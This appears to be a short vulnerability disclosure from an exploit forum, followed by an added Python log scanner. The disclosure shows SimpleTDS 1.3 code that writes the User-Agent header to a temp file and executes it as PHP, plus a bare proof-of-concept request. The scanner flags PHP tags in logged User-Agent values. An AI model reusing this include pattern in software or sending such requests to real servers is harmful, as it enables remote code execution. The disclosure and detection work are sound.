Expl0ited
10.10.2013, 12:17
Official distribution: http://simpletds.com/download-1_3
Vulnerable code in functions.php (lines 205-215):
PHP:
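{
    // True when the Accept header is absent or empty (loose == comparison)
    $accept = $_SERVER['HTTP_ACCEPT'] == null ? true : false;
    if ($debug || $accept) {
        $os_repository = tempnam(sys_get_temp_dir(), 'OSV');
        $tmp = fopen($os_repository, 'w');
        // The request-controlled User-Agent value is written to the temp file...
        fwrite($tmp, $_SERVER['HTTP_USER_AGENT']);
        fclose($tmp);
        // ...and the file is then executed as PHP
        include_once($os_repository);
        unlink($os_repository);
    }
}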
POC:
Code:
GET /functions.php HTTP/1.1
Host: localhost
User-Agent:
Accept:
Connection: keep-alive
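
A log check for the behaviour shown in the post, as an added example that is not part of the original post or of SimpleTDS: it flags requests whose User-Agent carries a PHP open tag, and raises the verdict to an alert when the Accept header is also empty, which is the condition the quoted code tests. The log layout (combined format plus a final quoted Accept field), the function names and all sample lines are assumptions constructed for this example.

```python
import re

# Assumed log layout (not from the post): combined format with the Accept
# header appended as a last quoted field, e.g. nginx "$http_accept".
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)" "(?P<accept>(?:[^"\\]|\\.)*)"'
)
PHP_TAG_RE = re.compile(r'<\?')  # covers <?php, <?= and the short tag <?

def unescape(field):
    # Servers log special bytes as \xHH; decode so an escaped tag is still seen.
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), field)

def classify(line):
    """Return None for an unparsable line, else (verdict, parsed fields)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    accept_missing = rec["accept"] in ("", "-")  # mirrors HTTP_ACCEPT == null
    php_in_ua = bool(PHP_TAG_RE.search(unescape(rec["ua"])))
    if accept_missing and php_in_ua:
        verdict = "alert"       # both inputs of the include path line up
    elif php_in_ua:
        verdict = "suspicious"  # block is skipped unless $debug is set
    else:
        verdict = "ok"
    return verdict, rec

SAMPLE_LOG = [  # constructed lines, not real traffic
    '192.0.2.10 - - [10/Oct/2013:12:01:00 +0400] "GET /functions.php HTTP/1.1" 200 0 "-" "<?php /* constructed marker */ ?>" "-"',
    '192.0.2.11 - - [10/Oct/2013:12:02:00 +0400] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 <?= 1 ?>" "text/html"',
    '192.0.2.12 - - [10/Oct/2013:12:03:00 +0400] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)" "-"',
]

def scan(lines):
    """Return (verdict, client ip, path) for every line that is not 'ok'."""
    hits = []
    for line in lines:
        res = classify(line)
        if res and res[0] != "ok":
            hits.append((res[0], res[1]["ip"], res[1]["path"]))
    return hits

if __name__ == "__main__":
    for verdict, ip, path in scan(SAMPLE_LOG):
        print(verdict, ip, path)
```

An empty Accept header on its own is common for scripts and monitoring probes, so the third sample line is left as "ok".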